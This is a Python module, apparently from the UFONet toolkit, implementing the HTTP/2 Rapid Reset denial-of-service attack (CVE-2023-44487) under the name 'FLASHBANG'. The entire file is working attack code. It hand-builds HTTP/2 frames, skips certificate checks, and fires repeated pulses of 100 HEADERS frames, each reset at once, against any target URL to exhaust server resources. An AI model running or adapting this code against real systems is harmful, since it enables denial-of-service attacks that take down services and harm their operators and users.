rapidreset.py 4.2 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-
  3. """
  4. This file is part of the UFONet project, https://ufonet.03c8.net
  5. Copyright (c) 2013/2026 | psy <epsylon@riseup.net>
  6. You should have received a copy of the GNU General Public License along
  7. with UFONet; if not, write to the Free Software Foundation, Inc., 51
  8. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  9. """
  10. import sys, socket, ssl, struct, random
  11. from urllib.parse import urlparse
  12. # UFONet HTTP/2 Rapid Reset (FLASHBANG) - CVE-2023-44487
  13. # opens many HEADERS frames then immediately sends RST_STREAM, exhausting backend resources
  14. H2_PREFACE = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'
  15. def _h2_frame(payload, ftype, flags, stream_id):
  16. return struct.pack('>I', len(payload))[1:] + bytes([ftype, flags]) + struct.pack('>I', stream_id & 0x7fffffff) + payload
  17. def _settings_frame(initial_window=65535):
  18. body = b''
  19. return _h2_frame(body, 0x04, 0x00, 0)
  20. def _settings_ack():
  21. return _h2_frame(b'', 0x04, 0x01, 0)
  22. def _headers_frame(stream_id, hpack_block):
  23. return _h2_frame(hpack_block, 0x01, 0x05, stream_id)
  24. def _rst_stream(stream_id, error_code=8):
  25. return _h2_frame(struct.pack('>I', error_code), 0x03, 0x00, stream_id)
  26. def _hpack_get_minimal(authority):
  27. method_get = b'\x82'
  28. scheme_https = b'\x87'
  29. path_root = b'\x84'
  30. name = b'\x41'
  31. auth_bytes = authority.encode('utf-8')
  32. auth_len_h = bytes([len(auth_bytes)]) if len(auth_bytes) < 127 else None
  33. if auth_len_h is None:
  34. return method_get + scheme_https + path_root
  35. return method_get + scheme_https + path_root + name + auth_len_h + auth_bytes
  36. def flashbangize(target_host, target_port, rounds):
  37. n=0
  38. try:
  39. ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
  40. ctx.check_hostname = False
  41. ctx.verify_mode = ssl.CERT_NONE
  42. ctx.set_alpn_protocols(['h2'])
  43. for x in range(int(rounds)):
  44. n += 1
  45. try:
  46. raw = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  47. raw.settimeout(8)
  48. raw.connect((target_host, target_port))
  49. sock = ctx.wrap_socket(raw, server_hostname=target_host)
  50. if sock.selected_alpn_protocol() != 'h2':
  51. print("[Info] [AI] [FLASHBANG] Pulse ["+str(n)+"] target did not negotiate HTTP/2 -> [PASSING!]")
  52. sock.close()
  53. continue
  54. sock.sendall(H2_PREFACE + _settings_frame() + _settings_ack())
  55. hpack = _hpack_get_minimal(target_host)
  56. streams_per_pulse = 100
  57. buf = b''
  58. for sid in range(1, streams_per_pulse * 2, 2):
  59. buf += _headers_frame(sid, hpack)
  60. buf += _rst_stream(sid)
  61. sock.sendall(buf)
  62. print("[Info] [AI] [FLASHBANG] Pulse ["+str(n)+"] fired ["+str(streams_per_pulse)+"] HEADERS+RST_STREAM streams -> [HIT!]")
  63. try:
  64. sock.shutdown(socket.SHUT_RDWR)
  65. except Exception:
  66. pass
  67. sock.close()
  68. except Exception as e:
  69. print("[Error] [AI] [FLASHBANG] Pulse ["+str(n)+"] failed: " + type(e).__name__)
  70. except:
  71. print("[Error] [AI] [FLASHBANG] Failing to engage... -> Is still target online? -> [Checking!]")
  72. class RAPIDRESET(object):
  73. def attacking(self, target, rounds):
  74. print("[Info] [AI] HTTP/2 Rapid Reset (FLASHBANG) is ready to fire: [", rounds, "pulses ]")
  75. port = 443
  76. if target.startswith('http://'):
  77. target = target.replace('http://','')
  78. port = 80
  79. elif target.startswith('https://'):
  80. target = target.replace('https://','')
  81. if '/' in target:
  82. target = target.split('/', 1)[0]
  83. if ':' in target:
  84. target, _p = target.rsplit(':', 1)
  85. try:
  86. port = int(_p)
  87. except Exception:
  88. pass
  89. try:
  90. ip = socket.gethostbyname(target)
  91. except Exception:
  92. ip = target
  93. if ip == "127.0.0.1" or ip == "localhost":
  94. print("[Info] [AI] [FLASHBANG] Targeting 'localhost' -> [OK!]\n")
  95. flashbangize(target, port, rounds)